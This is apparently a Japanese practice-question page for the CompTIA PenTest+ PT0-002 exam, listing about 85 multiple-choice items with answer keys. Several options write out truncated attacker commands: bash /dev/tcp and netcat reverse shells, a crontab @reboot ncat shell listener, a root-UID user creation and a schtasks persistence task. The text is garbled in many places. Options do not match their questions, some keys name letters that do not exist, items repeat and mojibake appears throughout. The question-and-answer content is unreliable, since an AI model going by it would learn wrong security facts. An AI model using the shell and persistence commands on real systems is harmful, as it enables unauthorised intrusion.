すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

更新されたCompTIA PenTest+ PT0-002試験問題集-成功への道

CompTIA PenTest+ PT0-002認定試験対策においては、信頼性の高い試験参考書を活用することが最も重要です。正確な模擬試験問題と解答の膨大なプールにアクセスすることで、知識のギャップを特定し、弱点の分野を強化することができます。包括的な学習ガイドやビデオコースなど、評判の高い学習教材は、侵入テストの概念について詳細な説明を提供します。実際の試験環境をシミュレートした模擬試験は、試験形式に慣れ、時間を効果的に管理するのに役立ちます。これらの試験リソースで定期的に練習することで、自信を深め、実際の試験でペネトレーション・テストの手法を適用する能力を高めることができます。高品質の学習教材と模擬試験とを組み合わせることによって、あなたはCompTIA PenTest+ PT0-002試験に合格するために必要なスキルと知識を身につけることができます。
他のオンライン試験を受ける

質問 #1
ある侵入テスト実施者が、無線セキュリティのレビューを請け負った。このテスト者は、ターゲットとなる企業のWiFiの構成を模倣した悪意のあるワイヤレスAPをデプロイしました。侵入テスト者は今、近くのワイヤレスステーションを悪意のあるAPに強制的に接続させたいと考えています。テスト者が次に取るべき手順はどれですか?
A. 以下の説明を参照のこと。
回答を見る
正解: A
質問 #2
デコンフリクションは、ペネトレーション・テストの際に必要である:
A. 専有情報が平文で保存されていると判断する。
B. 毎月の脆弱性スキャン中に発生する。
C. 評価の過程で、事前の妥協の指標を発見する。
D. 犯罪デジタル・フォレンジック調査と並行して進行する。
回答を見る
正解: D
質問 #3
あるソフトウェア会社が、データベース・サーバーへの侵入テストを行うために、侵入テス ターを雇った。テスターには、会社の個人情報保護方針で使用される様々なツールが与えられています。このサーバーの脆弱性を見つけるために使用するのに最も適しているのは、次のうちどれでしょうか?
A. オープンバス
B. ニクト
C. SQLマップ
D. ネサス
回答を見る
正解: C
質問 #4
ある侵入テスト者は、顧客の金融システムにアクセスするために8営業時間を与えられている。
A. 顧客の職場に行こうとする従業員を尾行しようとすること。
B. 会社のロゴ入りの悪質なUSBキーを駐車場に落とした。
C. 外部境界に対するブルートフォース攻撃を足がかりにする。
D. 上級管理職を装って従業員に対してスピアフィッシングを行う
回答を見る
正解: D
質問 #5
ある会社が、製造工場のサイバーフィジカルシステムをレビューするために侵入テストチームを雇った。チームは、監視システムと PLC がともに会社のイントラネットに接続されていることを即座に発見した。侵入テストチームが行ったと仮定した場合、最も妥当である可能性が高いのはどれか。
A. PLCは、ネットワーク経由で注入されたコマンドには反応しない。
B. スーパーバイザーとコントローラーは、デフォルトで別の仮想ネットワーク上にあります。
C. コントローラは、コマンドの発信元を検証しません。
D. 監督システムは、コード/コマンドの悪意のある注入を検知する。
回答を見る
正解: C
質問 #6
ある侵入テスト実施者が、あるエクスプロイトを使ってシステムにアクセスすることができた。以下は、利用されたコードのスニペットです。侵入テスト実施後に、侵入テスト実施者が実行すべきコマンドはどれですか?
A. grep -v apache ~/bash_history > ~/
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IMג€apacheג€ /F
回答を見る
正解: B
質問 #7
あるペネトレーション・テスターがアセスメント中に、管理者が会社の専有情報を流出させていることを発見する。管理者はテスターに口止め料を支払うと申し出た。テスターが取るべき最善の行動はどれか。
A. スコープ文書を確認し、流出が範囲内かどうかを判断する。
B. 侵入テストを中止する。
C. 問題をエスカレーションする。
D. 発見と交流を日報に記載する。
回答を見る
正解: C
質問 #8
IoT デバイスのベンダー情報やその他のセキュリティ関連情報を収集し、パッシブ偵察に役立てるのに最も有用なツールはどれか。
A. 初段
B. Nmap(エヌマップ
C. WebScarab-NG
D. ネサス
回答を見る
正解: A
質問 #9
ある企業が、ネットワーク上に不正なアクセスポイントを展開し、設定するために、侵入テスト担当者を雇いました。この目標を達成するために使用するツールとして、最も適切なものは次のうちどれですか。
A. ワイヤーシャーク
B. エアクラック
C. キスメット
D. ウィファイト
回答を見る
正解: B
質問 #10
Nmapスキャンの結果は以下の通りである。このデバイスに関する最良の結論はどれか。
A. 作業明細書の明確化
B. 顧客から資産目録を入手する。
C. すべてのステークホルダーへのインタビュー
D. 関係するすべての第三者を特定する。
回答を見る
正解: B
質問 #11
次の行番号のPythonコードスニペットが偵察に使用されている。このスクリプトの次の行番号のうち、このスクリプトが組織のIDSの「ポートスキャンの可能性がある」アラートをトリガーした可能性が最も高いのはどれか。
A. ライン01
B. ライン02
C. ライン07
D. 08号線
E. 12番線
回答を見る
正解: A
質問 #12
インターネットに直接接続されたIoTデバイスに関連する最も一般的な脆弱性はどれか?
A. サポートされていないオペレーティングシステム
B. DDoS攻撃に対する感受性
C. ネットワークができない
D. デフォルトパスワードの存在
回答を見る
正解: D
質問 #13
ある侵入テスト実施者が侵入テストを行っていたところ、ネットワークトラフィックがクライアントのIPアドレスに届かなくなっていることを発見しました。侵入テスト実施者は後で、SOCが侵入テスト実施者のIPアドレスにsinkholingを使用していたことを発見しました。
A. 侵入テスト担当者は間違った資産をテストしていた。
B. プランニングの過程で、全チームへの通達を徹底できなかった。
C. クライアントは査定開始の準備ができていなかった。
D. 侵入テスト実施者の連絡先が間違っていた。
回答を見る
正解: B
質問 #14
ある侵入テスト実施者に、192.168.1.0/24の範囲にある一連のターゲットを攻撃し、できるだけアラームや対策を発動させないようにする任務が与えられた。この目的を達成するのに最適なNmapスキャン構文はどれか。
A. nmap -sT -vvv -O 192
B. nmap -sV 192
C. nmap -sA -v -O 192
D. nmap -sS -O 192
回答を見る
正解: D
質問 #15
侵入テストの間、テスト者は URL の値を example.com/login.php?id=5 から example.com/login.php?id=10 に変更し、ウェブ・アプリケーションにアクセスすることができました。侵入テスト者は以下の脆弱性のどれを突きましたか?
A. コマンド・インジェクション
B. 壊れた認証
C. オブジェクトの直接参照
D. クロスサイト・スクリプティング
回答を見る
正解: C
質問 #16
ある物理的侵入テスト者は、不審な行動をとったり警備員に気づかれたりすることなく、ある組織のオ フィスに侵入し、機密情報を収集する必要がある。テスターは、会社の改札がバッジをスキャンしないこと、従業員がトイレに行くときにバッジをテーブルの上に放置することを観察しました。テスターがオフィスに物理的にアクセスするために使用できるテクニックは、次のうちどれですか?
A. クリックジャッキング
B. セッションハイジャック
C. パラメータ汚染
D. クッキーハイジャック
E. クロスサイト・スクリプティング
回答を見る
正解: CD
質問 #17
あるセキュリティ会社が、顧客と侵入テストの結果について話し合っている。調査結果に基づき、クライアントは残りの時間を重要なネットワークセグメントに集中させたいと考えている。次のうち、最も適切なものはどれですか。
A. 脆弱性を発見する可能性を最大化する
B. 目標/目的の再優先化
C. 偽陽性の可能性を排除する
D. クライアント環境へのリスク低減
回答を見る
正解: B
質問 #18
次の評価方法のうち、ICS環境に害を及ぼす可能性が最も高いものはどれか。
A. 関連するWiFiデバイスのWPS PINを盗聴し、クラックする。
B. デバイス上のユーザーアドレス帳をダンプする。
C. 2つのBluetoothデバイス間の接続を解除する。
D. テキストメッセージをデバイスに送信する。
回答を見る
正解: A
質問 #19
アプリケーション開発者チームを対象として作成された静的アプリケーションセキュリティテストの最終報告書に含めることが最も重要なものはどれですか?
A. 使用した侵入テスト方法の要旨
B. 消耗品、外注費、査定中に発生した費用を含む部品表
C. ソフトウェア侵害が成功した場合の定量的影響評価
D. 安全でない型キャスト操作のインスタンスのコードコンテキスト
回答を見る
正解: D
質問 #20
ある侵入テスト実施者が、発見トラバーサル経由でパスにアップロードする能力を提供する脆弱性を発見しました。この脆弱性によって発見されたファイルのいくつかは、次のとおりです。攻撃者が影響を受けたマシンに内部アクセスするための最も良い方法はどれですか?
A. 発見されたファイルを編集し、リモート・コールバック用のコードを1行追加する。
B. plファイルをダウンロードし、ユーザー名とパスワードを探す。
C. smb
D. smb
回答を見る
正解: C
質問 #21
あるレッドチームが、ある契約期間中にクライアントの内部ネットワークにアクセスし、レスポンダツールを使用して重要なデータをキャプチャしました。
A. 複数のハンドシェイク
B. IPアドレス
C. 暗号化されたファイル転送
D. SMB経由で送信されるユーザーハッシュ
回答を見る
正解: D
質問 #22
HOTSPOT (Drag and Dropはサポートされていません)あなたは、Webサーバーの堅牢化を任されたセキュリティアナリストです。インストラクション次の攻撃シグネチャを与えて、攻撃のタイプを決定し、将来その攻撃を防ぐための関連する改善策を特定します。シミュレーションの初期状態に戻したい場合は、いつでも「すべてリセット」ボタンをクリックしてください:
A. 答えは解説セクションを参照。
回答を見る
正解: A
質問 #23
ある侵入テスト実施者は、ポートスキャンの結果を一元化されたセキュリティツールにアップロードする必要があります。次のコマンドのうち、テスト者が結果を交換可能な形式で保存できるのはどれですか。
A. nmap -iL 結果 192
B. nmap 192
C. nmap -A 192
D. nmap 192
回答を見る
正解: C
質問 #24
ある侵入テスト実施者は、電子メールの添付ファイルを使用してデータの流出を試みることで、DLP製品の有効性を検証したいと考えています。このタスクを達成するために、テスターが選択すべき技法はどれか。
A. ステガノグラフィー
B. メタデータの削除
C. 暗号化
D. エンコード64
回答を見る
正解: A
質問 #25
ある侵入テスト実施者が、あるエクスプロイトを使ってシステムにアクセスすることができた。以下は、利用されたコードのスニペットです。侵入テスト実施後に、侵入テスト実施者が実行すべきコマンドはどれですか?
A. grep -v apache ~/bash_history > ~/
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM ?€apache?€ /F
回答を見る
正解: B
質問 #26
侵入テスト担当者が、ファイル所有者によるシェルスクリプトの実行を許可するコマンドはどれか。
A. chmod u+x script
B. chmod u+e script
C. chmod o+e script
D. chmod o+x script
回答を見る
正解: A
質問 #27
脆弱性評価を実施している侵入テスト実施者が、あるネットワークセグメントでICMPが無効になっていることを発見した。ネットワークセグメントに対するサービス拒否攻撃に使用できるのはどれか。
A. スマーフ
B. ピン洪水
C. フラッグル
D. 死のピング
回答を見る
正解: C
質問 #28
過去のセキュリティアセスメントを再検証する必要がある可能性が最も高いのは、次のどの状況か。
A. 違反の発見後
B. 合併・買収後
C. 組織がネットワーク・ファイアウォールの設定を更新する場合
D. ほとんどの脆弱性が修正された場合
回答を見る
正解: B
質問 #29
ある侵入テスト者が未知の環境テスト中にping `"A "コマンドを実行し、TTL 128のパケットを返した。次のOSのうち、このタイプのパケットを返す可能性が最も高いのはどれか?
A. ウィンドウズ
B. アップル
C. リナックス
D. アンドロイド
回答を見る
正解: A
質問 #30
ある侵入テスト実施者が、Windowsサーバー上で次のコマンドを実行しました。
A. スケジュールされたバッチジョブを削除します。
B. 逆シェル接続を閉じる。
C. svsaccountパーミッションをダウングレードする。
D. テスターが作成した認証情報を削除する。
回答を見る
正解: D
質問 #31
ある侵入テスト者が、ネットワークデバイス上のSSHデーモンに対して、一般的なパスワードのリストをテストしたいと考えています。この目的のために使用するのに最適なツールはどれか。
A. ハッシュキャット
B. ミミカッツ
C. パテーター
D. 切り裂きジョン
回答を見る
正解: C
質問 #32
新しいセキュリティー会社が最初のクライアントに乗り込む。そのクライアントは週末にしかテストを許可せず、月曜日の朝に結果を必要としていた。しかし、アセスメントチームは月曜日まで環境にアクセスできませんでした。アセスメントを開始する前に、セキュリティ会社が入手しておくべきものはどれか?
A. 署名された業務明細書
B. 正しいユーザーアカウントと関連するパスワード
C. 査定の予定期間
D. クライアントの適切な緊急連絡先
回答を見る
正解: D
質問 #33
ペネトレーションテストの実施中に、あるコンサルタントがフィッシングキャンペーンの潜在的な標的を特定するために、クライアントの偵察を行います。次のうちどれを使えば、コンサルタントはクライアントのサイバーセキュリティツールを起動することなく、技術連絡先と請求連絡先の電子メールアドレスを迅速に取得できるでしょうか(2つ選びなさい)。
A. SOW。
B. SLA。
C. ROE。
D. NDA
回答を見る
正解: BC
質問 #34
あるペネトレーション・テスターが、評価対象の会社が製造している様々なソフトウ ェア製品の分析を完了した。テスターは、過去数年間、開発されている有機的なコードの品質が非常に良いにもかかわらず、同社が複数の製品に脆弱なサードパーティモジュールを含めていることを発見した。ペネトレーションテスターが報告書に含めるべき推奨事項はどれか。
A. ツールチェーンに依存性チェッカーを追加する。
B. コミットされたコードの静的および動的解析を定期的に行う。
C. デプロイ前にAPIセキュリティ設定を検証する。
D. コンパイル済みバイナリのファズテストを実行する。
回答を見る
正解: A
質問 #35
ネットワークスイッチのNmapスキャンにより、以下のことが判明した。このデバイスに対して、最も最初に推奨される技術的管理はどれか。
A. 暗号化されたパスワード
B. システム・ハードニング・テクニック
C. 多要素認証
D. ネットワーク・セグメンテーション
回答を見る
正解: B
質問 #36
侵入テスト実施者は、ターゲットとFTPプロトコルを持つサーバーの間にオンパス攻撃としてワークステーションを配置することで、FTP認証情報を取得したいと考えている。この目的を達成するための最良の方法はどれか。
A. 次のログインを待ち、サーバーに対してダウングレード攻撃を行う。
B. Wiresharkを使用してトラフィックをキャプチャします。
C. サーバーに対してブルートフォース攻撃を行う。
D. サーバーに対してFTPエクスプロイトを使用する。
回答を見る
正解: B
質問 #37
文字列の値を別の文字列に追加することを呼ぶ:
A. コンパイル
B. コネクション
C. 連結
D. 接続
回答を見る
正解: C
質問 #38
コンプライアンス・ベースのペネトレーション・テストは、主に次のような点を重視する:
A. 保護されたネットワークからPIIを取得する。
B. エッジデバイスの保護をバイパスする。
C. 特定のセキュリティ標準の有効性を判断する。
D. 保護されたネットワークから特定の情報を取得する。
回答を見る
正解: C
質問 #39
ある会社が、従業員に対するソーシャル・エンジニアリング・テストを行うために侵入テス ターを雇った。テスターはその会社のウェブサイト上で従業員の電話番号を見つけられなかったが、数カ月前に電話番号の完全なカタログが公開されたことを知った。
A. ウェブアーカイブ
B. ギットハブ
C. ファイルのメタデータ
D. アンダーグラウンド・フォーラム
回答を見る
正解: A
質問 #40
ある企業がクラウドサービスプロバイダーから脆弱性スキャンの許可を得たので、ホストされているデータのセキュリティをテストしたいと考えている。このリスクを評価するために、テスターが最初に確認すべきことはどれか。
A. nc 10
B. powershell -exec bypass -f ¦Powered bypass
C. bash -i >& /dev/tcp/10
D. wget 10
回答を見る
正解: A
質問 #41
SCADA機器のある環境に対して侵入テストを行うことは、さらなる安全上のリスクをもたらす:
A. デバイスはより多くの熱を発生し、より多くの電力を消費する。
B. デバイスが古くなり、交換できなくなった。
C. プロトコルを理解するのはより難しい。
D. デバイスは物理的な世界への影響を引き起こす可能性がある。
回答を見る
正解: D
質問 #42
ある侵入テスト者が、サブネット上の生きているホストを迅速に発見しようとしている。次のコマンドのうち、pingスキャンを実行するものはどれか。
A. nmap -sn 10
B. nmap -sV -A 10
C. nmap -Pn 10
D. nmap -sT -p- 10
回答を見る
正解: A
質問 #43
ある侵入テスト者が社内のウェブサーバをブルートフォースし、以下の出力を生成するコマンドを実行した。しかし、侵入テスト者がURL http://172.16.100.10:3000/profile を閲覧しようとしたところ、空白のページが表示された。出力が得られない最も可能性の高い理由はどれか。
A. ファイアウォールでHTTPポートが開いていない。
B. テスターはコマンドの前にsudoを実行しなかった。
C. WebサーバーがHTTPではなくHTTPSを使用している。
D. このURIはサーバーエラーを返しました。
回答を見る
正解: D
質問 #44
ある侵入テスト実施者が、危殆化したウェブサーバーからJavaアプリケーションファイルをダウンロードし、次のログを見ることによって、それを呼び出す方法を特定した。Javaアプリケーションがソケット経由の暗号化を使用しているかどうかを検証するために、侵入テスト実施者が従うべき手順の順序はどれか。
A. アプリケーションの脆弱性スキャンを実行し、アプリケーションが使用するTCPポートを特定する。
B. デバッガに接続したアプリケーションを実行し、アプリケーションのログを確認する。
C. バイナリコードを逆アセンブルし、ブレークポイントを特定する。
D. Wiresharkでパケットキャプチャを開始し、アプリケーションを実行します。
回答を見る
正解: D
質問 #45
ある侵入テスト実施者が、保護されていない内部ソースコードリポジトリで、Web アプリケーションで使用されている PHP スクリプトを発見しました。このスクリプトを悪用するために侵入テスト者が使用するツールの組み合わせは、次のうちどれでしょうか。
A. ヒドラとクランチ
B. NetcatとcURL
C. バープ・スイートとDIRB
D. NmapとOWASP ZAP
回答を見る
正解: B
質問 #46
ある侵入テスト実施者が、MITRE ATT&CK フレームワークをある企業の法律顧問に説明しています。
A. セキュリティ侵入の手口を理解することで、侵入を阻止することができる。
B. フレームワークの一部であるスクリプトは、SIEMツールに直接インポートできる。
C. この方法論は、事故のコストをよりよく見積もるために使うことができる。
D. フレームワークは静的なものであり、長期にわたってセキュリティプログラムの安定性を保証する。
回答を見る
正解: A
質問 #47
ある侵入テスト者が、ある組織のオフィスの物理的セキュリティ評価を行うために雇われた。数時間環境を監視した後、ペネトレーションテスターは、何人かの従業員が近くのレストランで昼食を取り、食事を取っている間、自分の持ち物をテーブルの上に放置していることに気づいた。多くの警告を発することなく、組織の建物に合法的にアクセスするために使用される可能性が最も高い技法はどれか?
A. テールゲート
B. ダンプスター・ダイビング
C. ショルダーサーフィン
D. バッジクローン
回答を見る
正解: D
質問 #48
次のうち、OWASPトップ10を最もよく表しているものはどれか(2つ選んでください)。
A. 発見されたファイルを編集し、リモート・コールバック用のコードを1行追加する。
B. plファイルをダウンロードし、ユーザー名とパスワードを探す。
C. smb
D. smb
回答を見る
正解: AC
質問 #49
ある侵入テスト実施者が、最高経営責任者(CEO)の社内電子メールにアクセスしました。次の目的は、ネットワークにアクセスすることです。次の方法のうち、最もうまくいく可能性が高いのはどれですか?
A. CEOのアカウントからS/MIMEに使用されている秘密鍵を取得してみる。
B. CEOのアカウントから、新しいアカウントを要求するメールを送る。
C. メールサーバーからドメインコントローラーに横方向に移動する。
D. メールサーバーの特権を昇格させてrootアクセスを得ようとする。
回答を見る
正解: D
質問 #50
侵入テストの取り組みを計画する場合、テスト実行に最適な時間帯をめぐるルールを明確に示すことが重要である:
A. セキュリティコンプライアンスの規制や法律に違反する可能性がある。
B. テストを行うことで、実際のAPTを検出することがより困難になる可能性がある。
C. テストは、防御的なサイバー・チームや脅威ハンティング・チームの仕事量を増やす。
D. ビジネスやネットワークの運営に影響が出る可能性がある。
回答を見る
正解: D
質問 #51
侵入テストの取り組みを計画する場合、テスト実行に最適な時間帯をめぐるルールを明確に示すことが重要である:
A. セキュリティコンプライアンスの規制や法律に違反する可能性がある。
B. テストは、実際のAPTの検出をより困難にする可能性がある。
C. テストは、防御的なサイバー・チームや脅威ハンティング・チームの仕事量を増やす。
D. ビジネスやネットワークの運営に影響が出る可能性がある。
回答を見る
正解: D
質問 #52
あるセキュリティ会社が、ある企業に対する外部侵入テストを依頼された。会社が受け取った情報は、会社名だけであった。次の受動的な偵察アプローチのうち、初期段階で肯定的な結果が得られる可能性が最も高いのはどれか。
A. フィッシングメールを特別に作成し、会社の重要なリーダーに送りつける。
B. 会社の外部ウェブサイトに対して脆弱性スキャンを実行する。
C. 会社のベンダー/サプライチェーンをランタイムする。
D. ウェブサイトやソーシャルネットワーキングサイトをスクレイピングする。
回答を見る
正解: D
質問 #53
ある会社が、ネットワーク上で脆弱性スキャンを実施するため、侵入テスト実施者を募集した。テストは既知の環境で行われることが確認されている。アセスメントを実施する前にシステムを適切に識別するための最良の選択肢はどれか。
A. 資産目録
B. DNSレコード
C. ウェブアプリケーションスキャン
D. フルスキャン
回答を見る
正解: A
質問 #54
侵入テスト実施者は、クライアントのIDSに検出されることなく、ターゲットネットワークをスキャンしたいと考えています。以下のスキャンのうち、検出を回避できる可能性が最も高いものはどれですか?
A. 認証解除フレームをステーションに送信する。
B. 2
C. 悪意のあるAPが動的周波数選択チャネル内でブロードキャストするように設定する。
D. 悪意のあるAPの設定を変更し、事前共有キーを使用しないようにする。
回答を見る
正解: C
質問 #55
Python -m SimpleHTTPServer 9891次のコマンドのうち、exploitという名前のファイルをターゲットマシンにダウンロードして実行するために使用できるものはどれか。
A. nc 10
powershell -exec bypass -f \10. 0
C. bash -i >& /dev/tcp/10
D. wget 10
回答を見る
正解: D
質問 #56
ある侵入テスト実施者が、ウェブアプリケーションのテスト中に以下のトラフィックをキャプチャしました。
A. 認可ヘッダーをUTF-8でデコードする。
B. bcryptを使用して認可ヘッダーを復号化する。
C. Base64を使って認可ヘッダーをデコードする。
D. AESを使用して認証ヘッダーを復号化する。
回答を見る
正解: C
質問 #57
ある侵入テスト実施者が、モバイルクライアントのラップトップ上のWindowsワークステーションへのアクセスに成功した。テスト実施者がシステムへのアクセスを維持できるようにするために使用できるのはどれか。
A. schtasks /create /sc /ONSTART /tr C:|Temp|WindowsUpdate
B. wmic startup get caption,command
C. crontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€)| crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
回答を見る
正解: A
質問 #58
テスト対象のアプリケーションがすでにマルウェアに感染していることを特定した後、侵入テスト実施者が次に行うべきことはどれか。
A. マルウェアを分析し、それが何をするか確認する。
B. 適切な証拠を集めてから、マルウェアを削除する。
C. 根本原因分析を行い、マルウェアの侵入経路を突き止める。
D. マルウェアを直ちに削除する。
E. 評価を中止し、緊急連絡先に知らせる。
回答を見る
正解: E
質問 #59
情報セキュリティ最高責任者は、会社の電子商取引アプリケーションのセキュリティを評価したいと考えています。侵入テスト実施者は、アラームを発生させることなくアプリケーションから関連情報を取得するために、次のツールのどれを最初に使用すべきでしょうか?
A. SQLマップ
B. ダーバスター
C. w3af
D. OWASP ZAP
回答を見る
正解: D
質問 #60
ある侵入テスト者が顧客のウェブサイトを調査しています。テスト者はcurlコマンドを実行し、以下を取得します。侵入テスト者がこのサイトをさらに調査するために使用するツールとして、次のうちどれが最も適していますか?
A. バープ・スイート
B. ダーバスター
C. WPSスキャン
D. OWASP ZAP
回答を見る
正解: C
質問 #61
ある企業が侵入テスト担当者を雇い、ネットワーク上に不正なアクセスポイントを配備して設定させた。この目的を達成するために使用するツールとして、最も適切なものはどれか。
A. ワイヤーシャーク
B. エアクラック
C. キスメット
D. ウィファイト
回答を見る
正解: B
質問 #62
ある企業が、クラウド・サービス・プロバイダーから脆弱性スキャンの許可を得て、ホスティングされているデータのセキュリティをテストしたいと考えている。
A. 機密性の高い顧客データが一般に公開されているかどうか
B. クラウドとクライアント間の接続が安全かどうか
C. 顧客の従業員がプラットフォームを使用するための適切なトレーニングを受けているかどうか
D. クラウドアプリケーションが安全なSDLCを使用して開発されたかどうか
回答を見る
正解: A
質問 #63
ある新しいクライアントが、そのクライアントの新しいサービスに対する様々なセキュリ ティ評価のために、ペネトレーションテスト会社を1か月の契約で雇った。顧客は、評価が完了した後すぐに新サービスを一般に公開する予定で、重大な問題を除く発見事項は、サービスが公開された後に修正する予定である。クライアントは、シンプルなレポート構造を望んでおり、発見事項を毎日受け取ることを望んでいません。
A. クライアントが要求するフォーマットを確立する。
B. 顧客に直ちにエスカレーションするリスクの閾値を設定する。
C. 潜在的な偽陽性の方法を確立する。
D. 報告する曜日を決める。
回答を見る
正解: B
質問 #64
ある侵入テスト実施者が、dirbユーティリティを使ってウェブサーバをスキャンした結果、次のような結果を得た。
A. index
B. 約
C. インフォ
D. home
回答を見る
正解: B
質問 #65
ある侵入テスト実施者は、今度の侵入テストのために次のようなフィッシングメールを準備した。侵入テスト実施者が、フィッシングのターゲットにリンクをクリックさせるために最も利用しているのはどれか。
A. 親しみやすさと類似性
B. 権限と緊急性
C. 欠乏と恐怖
D. 社会的証明と欲
回答を見る
正解: B
質問 #66
ペネトレーションテスト活動が終了し、最初の調査結果がクライアントとレビューされました。次のうち、最も適切なものはどれですか?
A. クライアントによる最終報告書の受理とサインオフ
B. フォローアップ措置と再検査のスケジューリング
C. 調査結果の認証と報告書の提出
D. 婚約中のレッスンのレビュー
回答を見る
正解: A
質問 #67
ある侵入テスト実施者が最近行ったソーシャルエンジニアリング攻撃は、地元のコーヒーショップでターゲット企業の従業員を見つけ、時間をかけてその従業員と関係を築くというものでした。その従業員の誕生日に、テスト者はその従業員に外付けハードディスクドライブをプレゼントしました。
A. フィッシング
B. テールゲート
C. ベーティング
D. ショルダーサーフィン
回答を見る
正解: C
質問 #68
ペネトレーションテスト中にセキュリティアラームが作動したとき、ある企業は心配になった。
A. 侵入テストを中止する。
B. インシデント対応を行う。
C. ペネトレーション・テスターとの対立を解消する。
D. 警告は侵入テストによるものだと仮定する。
回答を見る
正解: C
質問 #69
侵入テスト者がシステムにアクセスし、ユーザープロセスに移行することができる。
A. テスターが間違ったIPアドレスを入力した。
B. このコマンドにはג€"port 135 "オプションが必要です。
C. サーバーにRDP用のアカウントが存在しない。
D. PowerShellには管理者権限が必要です。
回答を見る
正解: CD
質問 #70
Pythonの次の式のうち、変数valを1増やすものはどれか。(2つ選びなさい)
A. nmap ג€"T3 192
B. nmap ג€"P0 192
C. nmap ג€"T0 192
D. nmap ג€"A 192
回答を見る
正解: CF
質問 #71
ある侵入テスト実施者が、あるマシンでunshadowコマンドを実行する。このテスト実施者が次に使用する可能性が最も高いツールはどれか。
A. 切り裂きジョン
B. ヒドラ
C. ミミカッツ
D. カインとアベル
回答を見る
正解: A
質問 #72
シミュレーションあなたは、ウェブブラウザを通してクライアントのウェブサイトをレビューする侵入テスト実施者です。手順ブラウザを通してウェブサイトのすべてのコンポーネントをレビューし、脆弱性が存在するかどうかを判断します。
A. 以下の説明を参照のこと。
回答を見る
正解: A
質問 #73
ある侵入テスト実施者が、あるインタフェースに未知の IP 範囲を持つネットワークデバイスにアクセスしました。さらなる調査により、これはサードパーティサプライヤへの常時接続VPNトンネルであることが判明しました。侵入テスト実施者が取るべき行動として、最も適切なものは次のうちどれでしょうか。
A. トンネルを他の内部機器へのピボット手段として活用する。
B. IPレンジは範囲外なので無視する。
C. 評価を中止し、緊急連絡先に知らせる。
D. 悪用するシステムを追加するためにIP範囲をスキャンする。
回答を見る
正解: C
質問 #74
あるソフトウェア会社が、自社のソフトウェア開発手法のセキュリティを評価するために、セキュリティコンサルタントを雇った。このコンサルタントは、ソフトウェアバイナリに対してファジングを実行することで、偵察を開始することを選択した。次のうち、セキュリティコンサルタントが特定する可能性が最も高い脆弱性はどれか?
A. 弱い認証方式
B. 文字列に格納されたクレデンシャル
C. バッファ・オーバーフロー
D. 最適化されていないリソース管理
回答を見る
正解: C
質問 #75
侵入テスト担当者が、ファイル所有者によるシェルスクリプトの実行を許可するコマンドはどれか。
A. chmod u+x script
B. chmod u+e script
C. chmod o+e script
D. chmod o+x script
回答を見る
正解: A
質問 #76
ある侵入テスト実施者が、業務範囲内のウェブサーバがバックドアですでに侵害されていることを発見した。侵入テスト担当者が次に行うべきことはどれか。
A. バックドア型トロイの木馬をフォレンジック的に取得し、アトリビューションを実行する。
B. 交戦をサポートするためにバックドアを活用する。
C. 婚約を継続し、最終報告書に裏口所見を含める。
D. バックドアについて顧客に直ちに知らせる。
回答を見る
正解: D
質問 #77
ある侵入テスト実施者が、ネットワークスイッチの脆弱性を特定するために使用できる次の Perl スクリプトをダウンロードしました。しかし、このスクリプトは正常に動作していません。スクリプトを意図したとおりに動作させるために、テスターが適用すべき変更は次のうちどれですか。
A. 2行目を$ip=ג10
B. 3、5、6行目を削除する。
C. 6行目を削除する。
D. 7行目以下をすべてスクリプトの先頭に移動する。
回答を見る
正解: A
質問 #78
あるコンサルティング会社がスコーピング中にROEを完成させようとしている。
A. 査定費用
B. レポート配布
C. テストの制限
D. 責任
回答を見る
正解: C
質問 #79
侵入テスト中に CentOS コンピュータが悪用された。最初の偵察で、侵入テスト担当者は、ポート25が内部のSendmailサーバーで開いていることを発見しました。ステルス性を維持するために、テスト実施者は攻撃マシンから次のコマンドを実行しました。
A. nc 10
B. ssh 10
C. nc 127
D. ssh 127
回答を見る
正解: C
質問 #80
ある侵入テスト者は、Linux ベースのファイルサーバーへの root アクセスを取得し、再起動後も永続性を維持したいと考えています。この目的を最もよくサポートする技術はどれか。
A. リバースシェルを確立するために、ワンショットのシステムサービスを作成する。
B. /etc/shadowを取得し、rootパスワードをブルートフォースする。
C. Run the nc ג€"e /bin/sh <ג€¦> command
D. 横方向に移動し、LDAP上にユーザーアカウントを作成する。
回答を見る
正解: A
質問 #81
ある侵入テスト実施者がアセスメントを開始しようとしていますが、対象企業に関する公開情報しか持っていません。クライアントはこの演習を知っており、テストの準備をしています。次のうち、評価の範囲を表すものはどれですか?
A. 一部既知の環境テスト
B. 既知の環境テスト
C. 未知の環境テスト
D. 物理的環境試験
回答を見る
正解: C
質問 #82
ある最高情報セキュリティ責任者は、最近設置されたファイアウォールが、数十年前のレガシーシステムが多数接続されているサブネットワークを保護しているかどうかを、侵入テスト実施者に評価してもらいたいと考えている。侵入テスト実施者は、すべてのシステムと潜在的な脆弱性を特定するために、OSディスカバリとフルポートスキャンを実行することを決定します。侵入テスト実施者がスキャンを実行する前に考慮すべきことはどれか。
A. スキャンのタイミング
B. 帯域幅の制限
C. 資産とバージョンのインベントリー
D. スキャンの種類
回答を見る
正解: C
質問 #83
ある侵入テスト実施者は、今度の侵入テストのために次のようなフィッシングメールを準備した。侵入テスト実施者が、フィッシングのターゲットにリンクをクリックさせるために最も利用しているのはどれか。
A. 親近感と類似性
B. 権限と緊急性
C. 欠乏と恐怖
D. 社会的証明と欲
回答を見る
正解: B
質問 #84
あるセキュリティ会社が、PII と給与データが格納されている人事サーバーへのアクセスを試みるため、内部脅威の範囲を絞ったアセスメントを実施するよう請け負いました。侵入テスト担当者には、内部ネットワークの開始位置が与えられています。次のうち、実行された場合、評価の範囲内で倫理的に問題がある行動はどれでしょうか?
A. SQLデータベースの設定の弱点を突く
B. アウトバウンドTLSトラフィックの遮断
C. 全社的なアップデートサーバーにマルウェアを注入してホストにアクセスする
D. 内部CAの脆弱性を利用して不正なクライアント証明書を発行する。
E. ドメインコントローラーで永続性を確立し維持する
回答を見る
正解: A
質問 #85
次の Web アプリケーションのセキュリティリスクのうち、OWASP Top 10 v2017 に含まれているものはどれですか?(2つ選んでください)
A. このデバイスは、TCP/22経由のトランザクションにおけるハートビート拡張パケットの処理方法に起因するHeartbleedバグの脆弱性があり、攻撃者がプロセスメモリから機密情報を取得できる可能性があります。
